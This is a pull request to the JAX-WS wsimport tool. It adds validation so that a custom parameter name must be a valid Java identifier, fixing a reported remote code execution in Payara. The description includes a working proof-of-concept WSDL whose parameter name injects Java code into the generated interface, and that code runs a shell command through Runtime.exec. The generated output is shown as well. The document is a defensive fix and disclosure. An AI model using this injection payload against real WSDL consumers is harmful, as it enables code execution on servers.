### PR TITLE
Validate Custom Name (EE8)

### DIFF
--- a/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
+++ b/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 1997, 2018 Oracle and/or its affiliates. All rights reserved.
+ * Copyright (c) 1997, 2021 Oracle and/or its affiliates. All rights reserved.
  *
  * This program and the accompanying materials are made available under the
  * terms of the Eclipse Distribution License v. 1.0, which is available at

--- a/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
+++ b/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
@@ -926,20 +926,10 @@ public class WSDLModeler extends WSDLModelerBase {
                     error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_JAVA_RESERVED_WORD_NOT_ALLOWED_WRAPPER_STYLE(info.operation.getName(), param.getName(), param.getBlock().getName()));
                     return false;
                 }
-                // Custom name should be a valid variable name
-                if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
-                    error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_INVALID_JAVA_VARIABLE_NAME_WRAPPER_STYLE(info.operation.getName(), param.getName(), param.getBlock().getName()));
-                    return false;
-                }
             } else {
                 //non-wrapper style and rpclit
                 if (Names.isJavaReservedWord(param.getName())) {
                     error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_JAVA_RESERVED_WORD_NOT_ALLOWED_NON_WRAPPER_STYLE(info.operation.getName(), msg.getName(), param.getName()));
-                    return false;
-                }
-                // Custom name should be a valid variable name
-                if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
-                    error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_INVALID_JAVA_VARIABLE_NAME_NON_WRAPPER_STYLE(info.operation.getName(), msg.getName(), param.getName()));
                     return false;
                 }
             }

--- a/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
+++ b/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
@@ -915,7 +915,7 @@ public class WSDLModeler extends WSDLModelerBase {
                 }
                 // Custom name should be a valid variable name
                 if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
-                    error(param.getEntity(), "Invalid operation \"" + info.operation.getName() + "\", can't generate java method. Parameter,customized name \"" + param.getCustomName() + "\" is not a valid java variable name.");
+                    error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_INVALID_JAVA_VARIABLE_NAME_CUSTOM_NAME(info.operation.getName(), param.getCustomName()));
                     return false;
                 }
                 return true;
@@ -928,7 +928,7 @@ public class WSDLModeler extends WSDLModelerBase {
                 }
                 // Custom name should be a valid variable name
                 if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
-                    error(param.getEntity(), "Invalid operation \"" + info.operation.getName() + "\", can't generate java method. Local name of the wrapper child \"" + param.getName() + "\" in the global element \"" + param.getBlock().getName() + "\" is not a valid java variable name. Use customization to change the parameter name.");
+                    error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_INVALID_JAVA_VARIABLE_NAME_WRAPPER_STYLE(info.operation.getName(), param.getName(), param.getBlock().getName()));
                     return false;
                 }
             } else {
@@ -939,7 +939,7 @@ public class WSDLModeler extends WSDLModelerBase {
                 }
                 // Custom name should be a valid variable name
                 if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
-                    error(param.getEntity(), "Invalid operation \"" + info.operation.getName() + "\", can't generate java method. Parameter: part \"" + param.getName() + "\" in wsdl:message \"" + msg.getName() + "\" is not a valid java variable name. Use customization to change the parameter name.");
+                    error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_INVALID_JAVA_VARIABLE_NAME_NON_WRAPPER_STYLE(info.operation.getName(), msg.getName(), param.getName()));
                     return false;
                 }
             }

--- a/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
+++ b/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/processor/modeler/wsdl/WSDLModeler.java
@@ -913,6 +913,11 @@ public class WSDLModeler extends WSDLModelerBase {
                     error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_JAVA_RESERVED_WORD_NOT_ALLOWED_CUSTOM_NAME(info.operation.getName(), param.getCustomName()));
                     return false;
                 }
+                // Custom name should be a valid variable name
+                if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
+                    error(param.getEntity(), "Invalid operation \"" + info.operation.getName() + "\", can't generate java method. Parameter,customized name \"" + param.getCustomName() + "\" is not a valid java variable name.");
+                    return false;
+                }
                 return true;
             }
             //process doclit wrapper style
@@ -921,10 +926,20 @@ public class WSDLModeler extends WSDLModelerBase {
                     error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_JAVA_RESERVED_WORD_NOT_ALLOWED_WRAPPER_STYLE(info.operation.getName(), param.getName(), param.getBlock().getName()));
                     return false;
                 }
+                // Custom name should be a valid variable name
+                if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
+                    error(param.getEntity(), "Invalid operation \"" + info.operation.getName() + "\", can't generate java method. Local name of the wrapper child \"" + param.getName() + "\" in the global element \"" + param.getBlock().getName() + "\" is not a valid java variable name. Use customization to change the parameter name.");
+                    return false;
+                }
             } else {
                 //non-wrapper style and rpclit
                 if (Names.isJavaReservedWord(param.getName())) {
                     error(param.getEntity(), ModelerMessages.WSDLMODELER_INVALID_OPERATION_JAVA_RESERVED_WORD_NOT_ALLOWED_NON_WRAPPER_STYLE(info.operation.getName(), msg.getName(), param.getName()));
+                    return false;
+                }
+                // Custom name should be a valid variable name
+                if (!param.getCustomName().matches("^[_$a-zA-Z][_$\\w]*$")) {
+                    error(param.getEntity(), "Invalid operation \"" + info.operation.getName() + "\", can't generate java method. Parameter: part \"" + param.getName() + "\" in wsdl:message \"" + msg.getName() + "\" is not a valid java variable name. Use customization to change the parameter name.");
                     return false;
                 }
             }

--- a/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/wscompile/WsimportTool.java
+++ b/jaxws-ri/tools/wscompile/src/main/java/com/sun/tools/ws/wscompile/WsimportTool.java
@@ -434,7 +434,7 @@ public class WsimportTool {
 
         TJavaGeneratorExtension[] genExtn = ServiceFinder.find(TJavaGeneratorExtension.class, ServiceLoader.load(TJavaGeneratorExtension.class)).toArray();
         CustomExceptionGenerator.generate(wsdlModel,  options, receiver);
-            SeiGenerator.generate(wsdlModel, options, receiver, genExtn);
+        SeiGenerator.generate(wsdlModel, options, receiver, genExtn);
         if(receiver.hadError()){
             throw new AbortException();
         }

--- a/jaxws-ri/tools/wscompile/src/main/resources/com/sun/tools/ws/resources/modeler.properties
+++ b/jaxws-ri/tools/wscompile/src/main/resources/com/sun/tools/ws/resources/modeler.properties
@@ -217,6 +217,10 @@ wsdlmodeler.invalid.operation.javaReservedWordNotAllowed.wrapperStyle=Invalid op
 wsdlmodeler.warning.ignoringOperation.javaReservedWordNotAllowed.customName=Ignoring operation \"{0}\", can''t generate java method. Parameter,customized name \"{1}\" is a java keyword.
 wsdlmodeler.invalid.operation.javaReservedWordNotAllowed.customName=Invalid operation \"{0}\", can''t generate java method. Parameter,customized name \"{1}\"  is a java keyword.
 
+wsdlmodeler.invalid.operation.invalidJavaVariableName.nonWrapperStyle=Invalid operation \"{0}\", can''t generate java method. Parameter: part "{2}\" in wsdl:message \"{1}\", is not a valid java variable name. Use customization to change the parameter name or change the wsdl:part name.
+wsdlmodeler.invalid.operation.invalidJavaVariableName.wrapperStyle=Invalid operation \"{0}\", can''t generate java method parameter. Local name of the wrapper child \"{1}\" in the global element \"{2}\" is not a valid java variable name. Use customization to change the parameter name.
+wsdlmodeler.invalid.operation.invalidJavaVariableName.customName=Invalid operation \"{0}\", can''t generate java method. Parameter,customized name \"{1}\" is not a valid java variable name.
+
 wsdlmodeler.warning.ignoringOperation.javaReservedWordNotAllowed.operationName=Ignoring operation \"{0}\", it''s java reserved word, can''t generate java method. Use customization to change the operation name.
 wsdlmodeler.invalid.operation.javaReservedWordNotAllowed.operationName=Invalid operation \"{0}\", it''s java reserved word, can''t generate java method. Use customization to change the operation name.
 

--- a/jaxws-ri/tools/wscompile/src/main/resources/com/sun/tools/ws/resources/modeler.properties
+++ b/jaxws-ri/tools/wscompile/src/main/resources/com/sun/tools/ws/resources/modeler.properties
@@ -217,8 +217,6 @@ wsdlmodeler.invalid.operation.javaReservedWordNotAllowed.wrapperStyle=Invalid op
 wsdlmodeler.warning.ignoringOperation.javaReservedWordNotAllowed.customName=Ignoring operation \"{0}\", can''t generate java method. Parameter,customized name \"{1}\" is a java keyword.
 wsdlmodeler.invalid.operation.javaReservedWordNotAllowed.customName=Invalid operation \"{0}\", can''t generate java method. Parameter,customized name \"{1}\"  is a java keyword.
 
-wsdlmodeler.invalid.operation.invalidJavaVariableName.nonWrapperStyle=Invalid operation \"{0}\", can''t generate java method. Parameter: part "{2}\" in wsdl:message \"{1}\", is not a valid java variable name. Use customization to change the parameter name or change the wsdl:part name.
-wsdlmodeler.invalid.operation.invalidJavaVariableName.wrapperStyle=Invalid operation \"{0}\", can''t generate java method parameter. Local name of the wrapper child \"{1}\" in the global element \"{2}\" is not a valid java variable name. Use customization to change the parameter name.
 wsdlmodeler.invalid.operation.invalidJavaVariableName.customName=Invalid operation \"{0}\", can''t generate java method. Parameter,customized name \"{1}\" is not a valid java variable name.
 
 wsdlmodeler.warning.ignoringOperation.javaReservedWordNotAllowed.operationName=Ignoring operation \"{0}\", it''s java reserved word, can''t generate java method. Use customization to change the operation name.

--- a/jaxws-ri/tools/wscompile/src/main/resources/com/sun/tools/ws/resources/modeler.properties
+++ b/jaxws-ri/tools/wscompile/src/main/resources/com/sun/tools/ws/resources/modeler.properties
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2005, 2018 Oracle and/or its affiliates. All rights reserved.
+# Copyright (c) 2005, 2021 Oracle and/or its affiliates. All rights reserved.
 #
 # This program and the accompanying materials are made available under the
 # terms of the Eclipse Distribution License v. 1.0, which is available at


### PR DESCRIPTION
Backport of https://github.com/eclipse-ee4j/metro-jax-ws/pull/221

A Remote Code Execution was reported in Payara, achieved via a Host Header attack of the Webservice Tester servlet which gets loaded on deployment of a JAX-WS application.

The Host Header attack was fixed in the servlet, but for completeness we also looked into fixing the RME too.
In the example given to us, the RME comes in from a custom parameter name binding not being validated or sanitised, leading to the parameter getting replaced with malicious code. Specifically in the example given to us (but not necessarily limited to this), the parameter name in the javadoc of the method gets replaced with malicious code.

I took the leap, based on the current validation, that a custom name needs to be a valid Java variable (no spaces, no "/*" to start a comment, etc.), so I added in validation for that which has the codegen fail at the wsimport stage. An alternative suggestion for a fix was to go one level deeper and validate/sanitise during the actual codegen, but I opted to do it here for simplicity.

Example malicious WSDL:
```
<?xml version='1.0' encoding='UTF-8'?>
<definitions targetNamespace="http://schemas.xmlsoap.org/ws/2004/10/wsat" xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:jaxws="http://java.sun.com/xml/ns/jaxws" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tns="http://schemas.xmlsoap.org/ws/2004/10/wsat" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
	<jaxws:bindings>
		<jaxws:package name="example"/>
	</jaxws:bindings>
	<types>
		<xs:schema targetNamespace="http://schemas.xmlsoap.org/ws/2004/10/wsat" xmlns:xs="http://www.w3.org/2001/XMLSchema">
			<xs:element name="testMeth1Request">
				<xs:complexType>
					<xs:sequence>
						<xs:element minOccurs="0" name="arg0" type="xs:string"/>
					</xs:sequence>
				</xs:complexType>
			</xs:element>
			<xs:element name="testMeth1Response">
				<xs:complexType>
					<xs:sequence>
						<xs:element minOccurs="0" name="return" type="xs:string"/>
					</xs:sequence>
				</xs:complexType>
			</xs:element>
		</xs:schema>
	</types>
	<message name="testMeth1Request">
		<part element="tns:testMeth1Request" name="parameters"/>
	</message>
	<message name="testMeth1Response">
		<part element="tns:testMeth1Response" name="parameters"/>
	</message>
	<portType name="TestService1">
		<operation name="testMeth1">
			<input message="tns:testMeth1Request"/>
			<output message="tns:testMeth1Response"/>
		</operation>
	</portType>
	<binding name="TestService1PortBinding" type="tns:TestService1">
		<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
		<operation name="testMeth1">
			<jaxws:bindings>
				<jaxws:parameter childElementName="testMeth1Request" part="wsdl:definitions/wsdl:message[@name='testMeth1Request']/wsdl:part[@name='parameters']"
					 name="payload/*/@WebMethod@javax.xml.ws.RequestWrapper(className=&quot;example.TestService1$Foo&quot;)@SOAPBinding(parameterStyle=SOAPBinding.ParameterStyle.WRAPPED)public String testMeth1(@WebParam String foo);class Foo extends org.xmlsoap.schemas.ws._2004._10.wsat.TestMeth1Request{{try{Runtime.getRuntime().exec(new String[]{&quot;sh&quot;,&quot;-c&quot;,&quot;date +%s >> /opt/payara/appserver/glassfish/domains/production/docroot/output.js&quot;});}catch(Exception e){}}}}interface Bar{/*/" />
			</jaxws:bindings>
			<soap:operation soapAction=""/>
			<input>
				<soap:body use="literal"/>
			</input>
			<output>
				<soap:body use="literal"/>
			</output>
		</operation>
	</binding>
	<service name="WSATCoordinator">
		<port binding="tns:TestService1PortBinding" name="Participant">
			<soap:address location="http://127.0.0.1/foo/bar"/>
		</port>
	</service>
</definitions>
```
Which generates something like this (method injected via replacing the param in javadoc):
```
public interface TestService1 {
    /**
     * @param payload/
     */
    @WebMethod
    @javax.xml.ws.RequestWrapper(className = "example.TestService1$Foo")
    @SOAPBinding(parameterStyle = SOAPBinding.ParameterStyle.WRAPPED)
    public String testMeth1(@WebParam String foo);
    class Foo extends org.xmlsoap.schemas.ws._2004._10.wsat.TestMeth1Request {
        {
            try {
                Runtime.getRuntime().exec(new String[]{"sh", "-c", "date +%s >> /opt/payara/appserver/glassfish/domains/production/docroot/output.js"});
            } catch (Exception e) {
            }
        }}
}
interface Bar {/*/
 * @return
 *     returns org.xmlsoap.schemas.ws._2004._10.wsat.TestMeth1Response
 */
    @WebMethod
    @WebResult(name = "testMeth1Response", targetNamespace = "http://schemas.xmlsoap.org/ws/2004/10/wsat", partName = "parameters")
    public TestMeth1Response testMeth1(
            @WebParam(name = "testMeth1Request", targetNamespace = "http://schemas.xmlsoap.org/ws/2004/10/wsat", partName = "parameters")
                    TestMeth1Request payload/*/@WebMethod@javax.xml.ws.RequestWrapper(className="example.TestService1$Foo")@SOAPBinding(parameterStyle=SOAPBinding.ParameterStyle.WRAPPED)public String testMeth1(@WebParam String foo);class Foo extends org.xmlsoap.schemas.ws._2004._10.wsat.TestMeth1Request{{try{Runtime.getRuntime().exec(new String[]{"sh","-c","date +%s >> /opt/payara/appserver/glassfish/domains/production/docroot/output.js"});}catch(Exception e){}}}}interface Bar{/*/);
}
```